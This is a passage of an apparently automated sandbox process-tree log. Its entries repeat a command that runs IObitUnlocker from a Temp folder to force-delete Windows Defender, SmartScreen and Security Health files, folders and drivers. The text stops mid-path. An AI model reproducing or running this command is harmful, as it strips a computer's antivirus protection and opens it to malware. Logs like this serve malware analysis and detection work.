                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:5224
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                PID:5928
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:3328
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:5280
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:5392
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:3992
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:1192
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:5920
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:1540
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:1884
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 